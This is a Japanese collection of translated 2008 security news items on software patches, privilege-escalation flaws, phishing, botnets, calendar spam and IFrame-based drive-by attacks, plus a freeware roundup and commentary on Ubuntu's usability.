 Firefox 2.0.0.14がリリースされて丁度2週間後、E-MailクライアントThunderbirdのアップデートバージョンが今ダウンロードできる。この新しいバージョンは、アタッカーが悪意あるコードをインストールできる二つのセキュリティホールを塞いでいる。
 この二つの脆弱性はJavaScriptに関連するものである。Thunderbirdはdefaultでこれを無効にした。そして、Mozillaの開発者達はこの機能をアクティブにすることに対し明瞭に警告している。セキュリティ アドバイザリMFSA2008-15は、それが侵入したコードを実行することを可能にしメモリ破壊を導くクラッシュについて論議している。MFSA2008-14でレポートされた脆弱性は、アタッカーが巧妙なJavaScriptを使用して彼らの権限を昇格させ、任意のコードを実行する方法について説明している。
 このアップデートは、ヘルプメニューの「アップデートをチェック」オプションをクリックすることで自動的にダウンロードされインストールされるが、完全なインストーラのアップデートバージョンはMozillaのサーバで利用可能である。Thuderbirdユーザは可能な限り早急にアップデートすべきである。Linuxディストリビュータは、多分もう直アップデートパッケージを提供するだろう。

9つのフリーウェア、持つべき必須のアプリケーション
Windows Secret : News Letter (2008/04/24)

 Webサイトや雑誌に公開される「最高のフリーウェア」はしばしば多くのプログラムを賞賛するが、その結果は至極少数の試験者の主観的な意見の反映である。
 とびきり最高の物を発見するために、私は少なくともレビューのうちの三つに支持されるプログラムを発見するために、四つの評判の良い出版物に掲載された「至高の」フリーウェアの総括を比較した
 ほんの僅かなフリーウェアが複数の賞賛を得ていた。
 大抵のフリーのプログラムは極小数の人々に印象を与えるが、アプリケーションは複数の異なった独立した組織によってテストされているので、検閲を通過するため真に価値あるものである。
 一つのフリーウェアのレビューの主観性を減少させるために、以下のソースにポストされた最新の「最高のフリーウェア」リストから繰り返し受賞している物を選択した。

    ・ 「あなたが今必要とする25のフリーダウンロード」、Computer Shopper、2008年5月号
    ・ 「101の素晴らしいフリーソフト」、PC World、2008年5月号
    ・ 「最高のソフトウェア」、PC Magazine、2008年5月号
    ・ 「これまで最高のフリーウェアユーティリティ」と「拡張リストーこれまで最高のフリーソフトへの71の追加」、Gizmo's Tech Support Alertサイトで4月と5月に別々にアップデートされた(拡張リストは登録者のみ利用可能)。

複数の賛同を得たセキュリティ アプリケーションとシステム ツール
 数多の製造物が上記の四つのリストに記載されているにもかかわらず、重複して賛同されている物は驚くほど少ない。上記出版物の内、少なくとも三つによって評価されている製造物は僅かに9つである。私はこれらのプログラムをテストしていないが、Windows Secretの編集者はこれらのプログラムに大変馴染んでいるし、彼らが本当に以下にリストされている物を使用していることを明瞭に宣言できる。
 私は選択をダウンロード可能なソフトウェアに限定し、最高とレビューされるオンラインサービスを排除した。これに関しては今後のコラムでカバーするだろう。
 ここにフリーウェア評論者のの意見の一致がある。

Avira AntiVir Personal(Avira アンチウィルス)
 あなたはソフトウェア全体で、その商用バージョンより上位にランクされるアンチウィルスプログラムのフリーバージョンを多分見たことが無いだろうが、Avira AntiVirは商用ベースのアンチウィルスプログラムと互角に競争するフリー版を与えている。このプログラムはマルウェアの検出評価で高得点を得ており、Rootkit検出能力もある。評者によって指摘されている主たる欠点は、Avira AntiVirのフリーバージョンが入力メールをスキャンしないことである。しかしながら、このプログラムはメールを保存した後、E-Mail添付ファイルはスキャンする。そして、感染したE-Mailを開いたならマルウェアを検出する。

Comodo Firewall Pro(COMODO ファイアーウォール)
 Windows XPやVista備え付けのファイアーウォールよりずっと徹底している。Comodoは長大な安全サイトのホワイトリストを持っている。ユーザはサーフィンしているサイトをこれに追加できる。評者はこれをシステム保護における「強力」と「頑丈」と呼んでいる。しかし評者は、ユーザ特有の設定をする前にかなりの下準備を実行しなければならないため、この製品は初心者には多少複雑であると付け加えている(この4月17日のコラムで、Mark Joseph Edwardsはパーソナルファイアーウォールの独自テストでCOMODOは高得点を記録したと記述している)。

TrueCrypt(暗号化仮想ドライブの作成や既存ドライブの暗号化ソフト)
 覗き見からあなたのデータを守りたいなら、TrueCryptが複数の評者の賛同を得ている。このオープンソースプログラムはWindows Explorerや他のファイルマネージャでディスクドライバとして現れ、暗号化ファイルを作成できる。TrueCryptはドライブ全体(フラッシュドライブのような)、ドライブパーティション、一時的な安全のために非表示のドライブボリュームを暗号化することもできる。

CCleaner(不要ファイル除去ソフト)
 私が検証したリスとの数多の製造物で、唯一PiriformのCCleanerが上記四つのフリーウェア総括全てで推薦されていた。CCleanerはTEMPファイル、クッキー、履歴、最近のドキュメントリスト、Recycle Bin中のログファイル、多くの他のデジタル ゴミを削除することで、あなたのシステムをゴシゴシ洗濯する。このユーティリティはアプリケーションや、アンインストール時に削除されなかったり、不要なレジストリエントリをアンインストールするために使用することもできる。

Thunderbird用プラグイン、Lightning
 Mozilla FoundationのE-MailプログラムThunderbird(フリー)は最高であるが、Microsoft OutlookのカレンダとToDoリストが欠けている。この解決はLightning(MozillaのSunbirdカレンダプログラムとThunderbirdのE-Mail機能を結合するプラグイン)を使用することである。(Thunderbirdを使用しなくても、Sunbirdはフリーでダウンロードできる。スタンドアローン ツール)

Foxit Reader(PDFリーダ)
 あなたがAdobe Reder PDFビューワが大変遅く、ブロートソフト(肥満したソフト)であると考える多くの人のうちの一人であるなら、Foxit Readerを検討してみなさい。評者はAdobe Readerよりずっと高速であることを見出している。そして、彼らはFoxitが閲覧、印刷、注釈PDFに関する多くのオプションを提供していることに注目している。あなたはFoxitを使用してPDFフォームを埋めることさえ可能である。

Audacity(オーディオエディタ)
 あなたはプレゼンテーションやWebサイトで使用する音楽や他のサウンドを記録したり編集したりするために、商用オーディオプログラムに苦労して稼いだお金を費やす必要は無い。Audacityは、.mp3、.wav、他の人気あるオーディオフォーマットをサポートするオープンソースのオーディオエディタである。

Wavosaur(オーディオエディタ)
 Audacityだけが複数の評者の賛同を得たフリーのサウンドエディタではない。Wavosaurもまた一枚上である。このプログラムは少なくとも一つAudancityより優位性(単一実行ファイルなので、オーディオユーティリティをUSBフラッシュドライブから起動することを容易にする)をもっている。Wavosaurは小さなサイズであるが、あなたに機能を与えないということではない。このプログラムはオーディオ編集機能に素敵な配列を持っている。MP3フォーマットで出力するためにはフリーのLame Encoder .dllファイルをダウンロードする必要があるかもしれない。

Pidgin(コミュニケーションツール)
 AIM、Yahoo!メッセンジャ、Windows Live Messenger、他のメッセージング ネットワークを使用して誰かと連絡を保つために、毎回異なったチャットアプリケーションを開くことはイライラするものである。Pidginがあれば、他の全てのチャットアプリケーションを解雇することができる。このオープンソースIMクライアント(以前はGaimと称していた)は上述の全てと、他のかなり沢山のチャットネットワークのユーザとコミュニケーションすることが可能である。

「最高」とはあなたにとっての最高である。

以下略

Microsoft、Windows XP SP3のリリースを延期
WashingtonPost : Security Fix (2008/04/29)

 Microsoftは、アップデートに同梱される「互換問題」と、この会社が中小規模のビジネスへ売買するsupply-chain solutionを原因としてWindows XP用SP3のリリースを延期している。Microsoftは今迄、SP3は今日XPの顧客に対してWindows UpdateとMicrosoftのソフトウェアダウンロードセンター経由でリリースされるだろうと発言していた。
 記述されている説明でMicrosoftは以下のように発言している。

     「顧客に最高の状態での提供を確たる物にするため、我々はWindows UpdateとMicrosoft Download CenterからのWindows XP SP3のリリースを延期することを決定した。
     顧客保護の支援のために、我々はWindows UpdateがMicrosoft Dynamics RMS稼働システムに対する二つのサービスパックを提供できないようにするため、まもなくフィルタリングを置くことを計画している。一旦、フィルタリングが置かれたならば、Windwos XP SP3はWindows UpdateとDownload Centerにリリースされるだろう。」

   Security FixはMicrofostがSP3をダウンロード可能にしたなら改めてポストするだろう。ユーザがこのアップデートをインストールすることで享受できる簡潔な概要と共に。

UBUNTUは、それをデスクトップに成し得ることが可能か?
Windows Tips&Tricks : News (2008/04/28)

 多くの長所があるにもかかわらず、UBUNTUでさえホームPCユーザによる採用が殆ど進んでいない。マニアはUBUNTUの賛歌を歌うが、平均的ユーザ、非テクニカルなユーザは頻繁にUBUNTUによって当惑させられている。理由の一部はコマンドラインに関するLinux依存である。今、私は誰か同様にこのコマンドラインを大変好む(私はコマンドラインに関するWebサイトさえ持っている)。しかし、典型的なホームユーザは完全にGUIである。従って、全くコンドラインは起動されない。そして、Linuxがホームユーザには手に負えない別の領域がある。
 デスクトップビジネスのシェアに関してLinuxが直面している障害を例示するために、Great Ubuntu-Girlfriend Experimentに興味ある投稿がある。この著者はUBUNTUが、どのようにユーザフレンドリであるかをテストするために彼のガールフレンドを起用した。起用された女性はコンピュータの初心者ではない。大学で哲学を学ぶ学生で、多くのPCユーザよりコンピュータの経験は一枚も二枚も上である。それでも彼女は問題を持った。著者は結論付けている。

    Linuxは真にデスクトップ用として、コンピュータに無学な者がコンピュータの前に座り、わずかな努力で彼らが望むことを実行できるまでには至っていない。Erinは知的で、学習が速く、最新のテクノロジーをかなりよく知っている。彼女と同程度に大変な苦労をして、年配者、少なくとも中年の人々に、いかなるチャンスがをもたらされるのか?

 個人的に、私は引用中の最後の文章を「Linuxは数百万の非テクニカルなホームユーザにどのようなチャンスをもたらすのか?」と言い換える。多分UBUNTUは進化しつづけるだろうし、より実践的になるだろう。私はそうなることを希望する。何故なら、Windows独占に対する代替物を持つことが必要なことは、大変明らかなことである。
 フォローアップ : しばしばUBUNTUに関するポストを行っているAdrian Kingsley-Hughesはまた上で論議された実験とコメントを記している。

     私はLinuxが、初心者ユーザを取り込むという観点で殆ど進歩していない理由は、多くのディストリビューションがGeek Overloadに悩まされていると長く考えていた。今、嘘偽り無く、このことはこの数年間で劇的に改善された。そして、UBUNTUのようなディストリビューションは、とりわけ初心者にユーザフレンドリである。しかし、私はLinuxが順風満帆とも言えないことを知っている、私自身多くの応答遅延に見舞われている。

パッチを解析することで自動的に脆弱性を攻撃する
heiseSecurity : News (2008/04/25)

 思うに、今迄知られていないセキュリティホールへのパッチは、まさに配布用にリリースされた。そして数分以内に、最初のWebサイトがそのパッチの脆弱性を攻撃されて感染させられ、例えば、犠牲者の銀行の詳細データを盗むために、そのようなサイトを訪れる者にトローヤンを投げ落とす。この恐ろしいシナリオは直ちに日常茶飯事となる。
 SCHOOL OF COMPUTER SCIENCE/Carnegie Mellon大学のDavid BrumleyとPongsin Poosankam、California大学のDawn Song、Pittsburgh大学のBerkeleyとJiang Zhengは、脆弱性を治療する目的のパッチをベースにして、その脆弱性を攻撃することが自動的に形成できるかどうかに注目している。そして、それが実現可能であることを示すことに成功した。
 彼らは提供されたそれぞれのアップデート用の五つのMicrosoftプログラムを検証した。BindiffやEDBSのようなツールを使用して、彼らはパッチと未パッチのファイルとの間の相違(更なる入力バリデーション(Integerインプット)を探している)をチェックしている。次に彼らはパッチされたバリデーションがエラーを戻す原因になる入力値を探した。このような入力値は閉じられた穴が脆弱性を攻撃されるために利用されること可能にする。
 この原則の上で、研究者は短期間内に少なくともパッチの充てられていないアプリケーションをクラッシュさせることができる脆弱性への攻撃を、自動的に発生させることを可能にした。さらに、幾つかのパスを稼働させることで、このチームは外部のプログラミングコードを密かに持ち込むために、このセキュリティホールの脆弱性を突いてしばしば成果を挙げている。
 我々は今、自動的にパッチを解析し、脆弱性を突く攻撃を発生させることが実現可能なこととして注意しなければならない。パッチの供給と脆弱性の攻撃との間のTime Windowはかなり縮んでいる。Default設定のWindowsコンピュータは午前三時頃自動的にアップデートを探す(【訳注】自動更新設定では毎日午前3時に更新を確認する)。しかし、Microsoftが既にパッチを昨晩の八時にリリースしていたならば、Webサイトは殆ど開きっ放しのセキュリティホール(悪意あるコードを密輸入するための)を誤用したままである。言わば、ユーザがeBay上のオークションをまだ見ていたり、早朝ネットサーフィンしたりしている時、人々はWindowsアップデートを手動で実行していない。
 研究チームはパッチの配布について何らかのことが実行されなければならないと結論している。彼らは長い期間に渡り緩慢なペースでロールアウトすることはもはやできない。そしてパッチが利用可能になれば直ちに全てのコンピュータに提供されるべきだと発言している。これは会社とサーバーに関して(使用中の最新版とソフトウェアの間で正しく相互作用していることが最初にチェックされなければならない)問題を含む。

Realtek HDドライバに権限昇格のセキュリティホール
heiseSecurity : News (2008/04/25)

 セキュリティサービスのWintercoreはRealtekのHDオーディオコーデック ドライバ中にセキュリティホールのあることを通知した。このセキュリティホールはローカルユーザに、彼らのシステム権限の昇格を可能にする。Realtekは既にこの脆弱性を塞いだドライバをアップデートしている。
 Wintercoreのアドバイザリによれば、Realtekドライバは、入出力プロセスがIOCTLを要求したときに、不正にバッファをチェックする。これはまたユーザに任意のレジストリキーの読み込みと書き込みを許可する。より深刻なことは、カーネルコンテキスト中のSYSTEM権限レベルで任意のコードを実行することを可能にする。
 Realtekは既にドライバをアップデートしており、そのサーバからダウンロードすることが可能である。WintercoreはWindwos Vista用のこのドライバに脆弱性を検出した。しかし、WindowsのVista以前のバージョン用のこのドライバもまた、この脆弱性を含んでいるかもしれない。影響を受けるユーザは悪意あるソフトウェアが、知らない間に、とりわけWindows Vistaの下ではUser Account Control (UAC)をトリガーとすることなしに、権限を昇格するためにこの古いドライバを使用することができるので、このアップデートをインストールすべきである。

フライフィッシング
F-Secure Weblog : News from the Lab (2008/04/25)

 フィッシングギャングの中には新しいテクニックを持つものがいる。彼らは今現在トローヤン-スパイと呼ばれるアプリケーションを使用している。
 先週、我々は以下のE-Mailを受け取った。

 このメッセージがアカウント名やパスワードの提供に関して何の説明もしていないことに注意。
 代わりに、安全性を拡張するためDigital Certificateをインストール必要があることを受信者に納得させることを企てている。
 このメッセージは以下のサイトにリンクしている。

 これは、犠牲者になる可能性のある者を制圧するために設計された専門用語満載のページである。犠牲者が誘惑に落ち、この"certificate"をインストールしたなら何が発生するのか? トローヤン-スパイがインストールされるだろう。
 今や、フィッシングを行う者は、もはやパスワードを訪ねる必要は無く、彼らはパスワード等を簡単に取得できる。
 この技術は信頼されている機関(銀行)を真似るというフィッシングの古典的要素を維持している。彼らが調整したことは、メールで要求されると、自分のパスワードを漏洩することに、人々が疑い深くなった部分である。

アップデート:
 ここに、このサイトがオンライン上に存在した時、我々が先週捕獲した簡潔なビデオがある。あなた方はLab's YouTube Channelで、これを見出すことができる。

高品質検索エンジン
Windows Tips & Trics : News (2008/04/21)

 Googleは立派な検索エンジンであるが、しばしば検索結果に多くのスパムや他の役に立たないサイトを含む。Search Engine Land によれば、代替検索エンジンとしてはHakiaがより良い検索を行っているとされる。

     Hakiaのブログは、このエンジンが「品質」アプローチ(サイトをランク付けする際に、専門調査員の助けを借りてサイトの信憑性を評価する)を取っていると説明している。Hakiaはとりわけ健全に関連する検索のコンテキストでこれを論議し、このアプローチを一般的に参照されている「人気」のGoogleオリジナルのページランク(PageRank)アルゴリズムと対比している。
     この会社は、専門のソースと調査員の支援によるインデクスとをベースにた一連の縦割り(法律、ファイナンス、科学、その他多くの縦割りコンテンツ)での「品質検索」をロールアウトするだろうと発言している。

Hakiaのサイトはこちらです。
http://hakia.com/

Web-Hostingプロバイダを警戒せよ
McAfee Avert Labs Blog (2008/04/18)

 この木曜日、Windows XP、2003、Vista、Server 2008上のIISとSQLサーバに影響を与える新たな権限昇格の脆弱性に関し、Microsoftはアドバイザリをリリースした
 これはドバイでのHITBセキュリティ カンファレンス2008でDubaiCesar Cerrudoによって論議されたフロー(彼の話では『トークン誘拐』)と同一であるかのようである。Cerrudoは以前にも権限昇格の脆弱性について論議している。そして三月、「設計上の弱点は、Windows XP、Vista、Internet Information Services 7、Windows Server 2003と2008で悪用することができる。」と発言している。
 このフローについて知られていることは何か? 認証された悪意あるローカルユーザは、ローカルシステムに対し彼の権限レベルを昇格させるために、とりわけ巧妙に細工されたコードを実行できる。IISとSQLサーバは、この主な攻撃ベクトルである。しかし、他のベクトル(Windowsサーバ2003上のMicrosoft Distributed Transaction Coordinator(MSDTC))は可能である。
 この脆弱性はローカル権限の昇格に限定されているので、IISの感受性が懸念される。このWebサーバはインターネット上で幅広く使用され、Webホスティングプロバイダにとって目玉である。我々はターゲットにされたWebホスティングプロバイダを確認するかもしれないーこれは怖いことだーWebサイトは破壊される。Microsoftはアドバイザリで述べているように、「ホスティングプロバイダは、権限昇格の脆弱性からのリスクを増加させるかもしれない」。しかしながら、現時点でこの開拓は観測されていない。
 次のPatch Tuesday(【訳注】Microsoftがパッチをリリースする日。毎月第二火曜日)は5月13日である。システムアドミニストレータへ、どうか次のPatch TuesdayまでMicrosoftが示唆している解決策に留意されたい。より端的に言えば、Microsoftがこの脆弱性にパッチを充てるまで。
 最後に、ちょっとした推量。この脆弱性に対するあるアタッカーのベクトルは、SeImpersonateClient権限を使用する。権限定数に関するMSDNページの説明:

    Windows XP/2000: この権限はサポートされていない。 この値は、Windows Server 2003、Windows XP SP2、Windows 2000 SP4でサポートが開始されたことに注意しなさい。

 MicrosoftはWindows2000やWindows2000 SP4に脆弱性があることを発言していない。不思議なことに、Windows XP SP2には脆弱性のあることを発言している。Windows XP SP2が、このオペレーティングシステム上にこの脆弱性を導入していたのであれば、Windows2000 SP4はWindows2000のために同じようにしていないだろうか?

Flash広告中のマルウェア
Windows Tips & Trics : News (2008/04/17)

 通常のまともなサイト中の広告で感染するマルウェアの問題は成長している。Windows Secretは、この深刻な問題をレポートしている。

引用:
     USA Today上に先週現れたフラッシュベースの広告は、ユーザのコンピュータに悪意あるコードをダウンロードし、マルウェア侵入の誤った警告を発生し、まやかしの解決策を申し出た。フラッシュ脆弱性は大変広範に拡散しているので、このような『マルウェア感染広告』は数千のサイトで表示されるかもしれない。しかし、あなたの汚染を抑制する方法がある。

 あなた自身を守るために、以前言及されたようにFlashプラグインをアップデートすることが急務である。これは全ての可能性ある問題をブロックすることを示唆してはいない。代わりうる方法はFlashを完全に無効化することである。私はFirefoxにNoScript拡張を設定してブラウズした。私はまたInternet Explorer用のアドオンであるIE7Proを持っている。このようなプラグインは共に選択的にFlashの有効化・無効化ができる。YouTubeのようなサイトを訪問するのであれば、ビデオはFlashフォーマットであることを、感染の可能性があることを認識しなければならない。.Windows Secretの記事は、YouTubeをより安全に閲覧するための方法を記述している。
 悲しい事実は、現時点でFlashを無効化する以外、Flash問題に対する簡単な防衛策は存在しないということである。信頼されているサイトでさえ感染させられている恐れがあるので、私は現在Flashを回避している。

補遺:
 金融機関や、それ以外の所もあなたのコンピュータを同定するための方法としてFlash Cookieを使用していることに注意しなさい。Flashを完全に無効化することは、毎回追加情報の入力を要求するこのようなサイトへのログインに問題を発生させるかもしれない。

Microsoft、Windows XP SP3を29日にリリースか?
PC World : Business Center (2008/04/16)

 Neowin.net Webサイトによってもたらされた内部スケジュールによれば、Microsoftは、来週コンピュータメーカと若干のITプロフェッショナルに対しWindows XP SP3をリリースするだろう。これは、4月29日に全てのユーザに対して提供される。
 しかしながら、他は以前同様4月の後半にリリースとしている。Neowinの日付は今迄の中でもっともはっきりしている。
 このサイトによれば、このサービスパックは4月21日にデビューする。コンピュータメーカへの出荷、ボリュームライセンスの顧客への提供、TechNetとMicrosoft Developper Network(MSDN)上にダウンロード用にポスト(ITスタッフ用サブスクリプションサービスと開発者用)されるためである。
 しかしながら、Microsoftがダウンロード用にWindowsアップデートにこれをリストするので、多くのユーザは4月29日SP3を入手できるだろう。
 しかし、6月10日までMicrosoftはSP3の自動ダウンロードとインストールを設定しない。とNeowinは発言している。
********************* 以下略

補足: Windows Tips and Tricksより
    SP3は主に以前のパッチとアップデートをまとめたものである。新しい機能はほとんど含まれていない。

スパマーは、注意を惹くためにGoogle、Outlookカレンダを使用する
WashingtonPost : Security Fix (2008/04/10)

 スパマーは、最新のデザイナー時計と処方薬を広告するメッセージを送信するためにGoogleカレンダとMicrosoft Outlookの会議室に招待する機能を使用することを開始している。今週、Security FixはOutlookの会議室に招待する添付ファイルの付いたE-Mailを受け取ったと発言する一読者からの話を聞いた。スパム野郎の招待に十分慎重だったので、彼はそのE-Mailを閉じ、それを無視した。しかし、数分後彼がOutlookカレンダを開いたとき、彼はスパムミーティングがスケジュールされてたことを発見し驚きを隠せなかった。
 首題に関してチョットだけGoogleした後、私は、最近スパマーがGoogleカレンダ ユーザに対して同じことを実行していることを発見した。あらゆる人がスパムを得るが、見れば分かるように、あなたのカレンダ上に表示されるスパマーによって送信された未承認のミーティングはかなり気味悪いものである。
 ここで何が進行しているのか? そして、このナンセンスをブロックする方法はあるのか?
 Outlookでは、この問題は多少度が過ぎてお節介なこのプログラムに起因しているようである。Outlookが会議室への招待を受け取ると、受信者がこの招待を受け入れるか拒否するまで、暫定的原則で要求された期限の邪魔をする。
 スパマーのためのこのアプローチの美しさは、もし人々がこの招待を拒否する(多くの人々はこの衝動に抵抗することが極端に困難であることを発見するかもしれない。)ことを選択したなら、このような人々は必ずスパマーへ応答している(常に悪しき考えである。なぜなら、スパマーにアクティブなE-Mailアドレスに到達したことを確認させるためである)。この状況はミーティングの招待を自動的に受け入れるように無分別にOutlookを設定している人々にとって悪いものである。
 私はGoogleカレンダサポートフォーラムで、Googleカレンダ ユーザは、彼らが作成した、もしくは受け入れた、このようなイベントだけを設定することができることを示唆する、この投稿を発見した。Googleによれば、そのようにする方法は以下である。

    1/ Googleカレンダページのトップにある「設定」をクリックする。
    2/ デフォルトで選択されていないのであれば、「一般」タブを選択する。
    3/ 「マイ カレンダに招待を自動的に追加する」セクションで、「いいえ、応答した招待だけを表示する」を選択する。
    4/ 「保存」をクリック。

 Googleはこのリンクを訪問することでカレンダ スパムを通報するようカレンダ ユーザを急かしている。
 私はOutlookユーザが、自動的に会議をスケジュールすることを停止するための類似の設定変更できることを間違いないと思うが、私がオンラインでそれを未だ発見していない。もしも、誰かがWindowsレジストリの編集をすることなしに、この問題のためのOutlookの修正を知ったならば、どうか以下にコメントを残してほしい。私はそれを確認した後、このエントリをアップデートするだろう。

感染デバイス
Kaspersky : Lab Weblog (2008/04/10)

 我々はもはやあらゆる種類のデバイスが感染していることについて聞かずにはいられないようである。今週、我々は既に感染したFloppy/Flashを出荷していたことをヒューレットパッカードが認めたことを知っている(詳細はSANS Internet Storm Centerを参照)。
 ところで、私の仕事仲間の一人がバケーションに行った。そして、彼女自身でMP3プレーヤに処理した。

 彼女は家に帰ると、彼女のPCのUSBポートに彼女の新しいおもちゃを差し込んだ。そう推察通り、感染していた。幸にして彼女はKIS(Kaspersky Internet Security)をインストールしていた。

 一方で、我々は皆、Smartphone、MP3プレーヤ、フラッシュドライブ等を楽しむ。他方で、我々は我々のデバイスがクリーンであることはもはや確かなことではない。このようなサーバやラップトップを保護するには、諸君・・・。ポータブルデバイスはもはや捨て去ることはできない。これらは、もはや安心できるものではない。

Adobeフラッシュプレイヤーの7つの脆弱性を修正
heiseSecurity : News (2008/04/09)

 AdobeはWindows、Linux、Mac、Solaris用のFlash Playerバージョン9.0.124.0をリリースした。これは7つのセキュリティ上の脆弱性を修正している。レポートによれば、アタッカーはコンピュータの制御を獲得するために巧妙に細工したSWFファイルを使用して、この脆弱性を攻撃することができる。ユーザは巧妙に細工されたWebページを訪問することで、もしくはFlash Playerを使用するアプリケーションでSWFファイルを開くことで、簡単に犠牲者となる。脆弱性の一つは最近“Pwn to Own”コンテスト(【訳注】CanSecWestセキュリティ カンファレンスにおけるハッキングコンテスト)で発見された脆弱性(Shane MacaulayがVistaラップトップのハックに成功した)に関連付けられている。
 このバグは、Flash Playerが不正なインスタンスを作成するActionScriptオブジェクトにアクセスすることを発生することによって、脆弱性を突かれることとなる。Zero Day Initiativeからのレポートによれば、これはDeclareFunction2タグの巧みな取扱いを要求する。Vistaのデータ実行防止(DEP)を欺くために、MacaulayのFlashハックはJava経由のチョットした迂回を行っている。DEPがアクティベートされていれば、Windows Vistaの元ではJavaは明らかに動作しない。この理由のためDEPはJavaのためにしばしば動作を停止させられる。
 他の脆弱性は主にドメインポリシーへの適応エラーである。それは他のドメインからのコンテンツへのアクセスを妨げることを目的とする。今回のアップデートは、セキュリティのより高いデフォルトのレベルを提供するために、Flash Playerの幾つかのセキュリティ設定を変更した。Adobeによれば、SWFファイルの中には、もはやJavaScript URLを完全にサポートしないので、役に立たなくなるものが存在するとしている。更なる詳細に関しては、Understanding Flash Player 9 April 2008 Security Update compatibilityに与えられている。
 ユーザーのPCを感染させるために脆弱性を突くWebサイトが速かに出現しそうなため、ユーザは可能な限り速やかに新バージョンをインストールすべきである。

ヒューレットパッカード、ウィルス付きフラッシュフロッピーUSBドライバを販売
Windows Tips & Tricks : News (2008/04/08)

 もはや誰も信じることはできない。HP(ヒューレットパッカード)は、ウィルスに感染したUSBドライバを販売していたことを認めた。PC Worldのレポートによると:

     ヒューレットパッカードはマルウェアに事前に感染させられていたUSBベースのハイブリッドフラッシュフロッピードライブを販売していたと、HPはセキュリティブレチンで先週発表した。
     “HP USB Floppy Drive Key”とも呼ばれる、このデバイスはフラッシュドライブとコンパクトフロッピードライブを組み合わせたものである。そして、HPのProLiant Serverラインの様々なモデルで動作するように設計されていた。HPはこのドライブの二つのバージョンを販売している。一つはフラッシュ容量256MBであり他の一つは記憶容量1GBである。

 このドライブはサーバ用に意図されているので、多くのホームユーザは影響を受けない。それにも拘らず、HPのような会社が、これを発生させることを許したことに、私は疑念を抱いた。

Kraken、ストームより巨大なボットネット
heiseSecurity : News (2008/04/08)

 セキュリティ会社Damballaの研究者はRSAカンファレンスでKrakenという最近のボットネットに関して報告した。40万ボットはストームボットネットの二倍である。既にフォーチュン米企業500社番付中の50社が感染したものと考えられている。
 このようなコンピュータに感染したマルウェアは、明らかにイメージファイルに偽装して到着する。これはアンチウィルスソフトによる検出を回避するため難読化戦略を使用する。そして、定期的にそのバイナリコードをアップデートする。このボットはカスタマイズされたUDPとTCPベースプロトコル経由でCommand and Control (C&C)サーバと通信する。そして、C&Cサーバが無効化されたなら、新たなドメイン名を発生させる。悪意の総体それ自身は暗号化されている。とDamballaのエキスパートは発言している。
 今まで、ボットネットは主に通常のスカムのスパミング(オンライン薬局、メールエンハンスメント、オンラインカジノ、高利のローン)を使用していた。この研究者は単独で長期間生存し、一日に500,000アイテムを送信しているKrakenボットを監視している。このマルウェアは、それ自身をアップデートする能力があるので、他のことを実行することをそれ自身に備え付けている。
 Damballaの研究者は最初、彼らがストームワームボットネットの変種を発見したと考えていたが、更なる調査で、このボットネットが全く無関係であることを露にした。このネットワークは昨年末に発見された。けれども、このマルウェアの早期バージョンは2006年後半に表れている。

【訳注】
C&Cサーバに関する説明は以下を参照してください
http://www.security.ocn.ne.jp/information/column/co20070305_02.html
【訳注】以下に関連記事のリンクを記しておきます。
F-Secure
WashingtonPost

Googleグループ、相変わらずマルウェアを押し付けるポルノの充満を継続中
Sunbelt Software : blog (2008/04/05)

 我々は今まで見てきたが、Googleグループに関する問題(偽のコーデックによるマルウェアを押し付けるためのポルノを表示する)は継続されている。
 検索用語に”porn”(【訳注】pornographyの略。ポルノの意)を使用してGoogleグループで単純に検索すると、このようなサイトの呆れ返る程の数が表示される。(興味があるなら、実行してもよいが、現実にリスクは存在する)
 例えば、ここに先月”porn video”をキーワードとしての検索結果256,000ヒット(警告:グラフィックコンテンツ)を示す。

 検索結果に焦点を当てると、このような巨大な数のマルウェアを押し付けようとする(偽のコーデック)ポストが存在していることを示している。

 等々。
 これは本当にクリーンアップされることが必要である。ユーザが感染させられる大変多くの脅威が、相も変わらず偽のコーデックに関連付けられているのが、その理由である。

IFrameって何、どうして気を付けなくてはいけないの?
Gurardian Unlimited : Technology (2008/04/03)

 それは(IFrame)邪悪な、あるいは信用できないWebサイトに行くことなしにユーザのPC上にマルウェアをロードするために試みられる人気ある方法である。事実、人気あるサイトへ行くためのGoogle検索中のリンクをクリックしなければならないだけである。そこには脆弱性を突く行為が予めロードされている。複数のサイトが影響を受けた。影響を受けたサイトには、USA Today、 Wal-Mart、ZD Net Asia等が含まれる。そして、拡散している最中である。

 IFrame(Appleの製品のことではない。”inline frame”の略である)は、まさに他のページ中にあるWebページ(通常は別のサーバから)をロードする方法である。これはオンラインアプリケーションを立ち上げるのに役に立つ。しかし、マルウェアの製作者は僅か1ピクセルの方形(あなたは、そこにそれがあることを見ることさえできないことを意味している)にこのページを含ませることができる。この含まされたページから自動的に起動するJavaScriptを難読化するので、これは%6C%20%66%72%61%6D%65%62%6Fのように見える。これは悪意があるという明白な手がかりを残さない。
 このアイデアが実行されたとき、IFrameコードはハックしているWebサーバによって挿入される。あるいは、バナー広告にそれを追加する。しかしながら過去6ヶ月に渡り、「毒化された」検索結果の利用が巨大な成長を遂げた。
 巨大なWebサイトは彼らのサイト上で実行された検索クエリーの結果をしばしばキャッシュするー言わば「悪意あるIFrame」のための検索用リンクーそれから、直接検索結果を発生させることのできるGoogleのような検索エンジンにこれらを送り届ける。マルウェアの製作者は「悪意あるIFrame」に全ての悪意あるIFrameのテキストを加えたようなものを検索クエリ中に挿入することでシステムの脆弱性を突く。このサイトが難読化されたJavascript用検索用語を適切にチェックしないのなら、このIFrameデータは記憶され伝えられる。次に誰かが「悪意あるIFrame」を検索し、その結果をクリックしたとき、この攻撃は検索結果から直接起動される。なぜなら、あなたができなくても、ブラウザは難読化されたJavascriptを読むことができる。
 マルウェアの配信者はかれらがサーバをハックする必要の無いためこれを好む。そして、サイトのSEO(検索エンジン最適化)実行から便益を得るため、そしてGoogleで高いランキングを得るために人気ある検索を使用する。この攻撃は半ダースもの「ドライブバイ」脆弱性を通常含んでいる。そしてまた何か他の物(本物のトロイの木馬の存在するビデオコーデックのような)をインストールするためのユーザを得るためソーシャルネットワーキングを使用する。IEセキュリティアップデートMS04-040を実行していないWindowsユーザは特に脆弱性が高い。そのようなものの多くが存在するかのようである。
 この攻撃を停止するにはどのようにすれば良いのか? 検索をキャッシュするサイトは彼らのインプットのチェックを改善しなければならない。そして、サーバ オペレータはIFrameで脆弱性を突くコードを捜索できる。Googleは悪意ある検索結果を削除しようとしており、幾つかの脆弱性を突く攻撃を自動検出し、"This site may harm your computer(【訳注】日本語表示は『このサイトはコンピュータに損害を与える可能性があります』)"という警告を行っている。
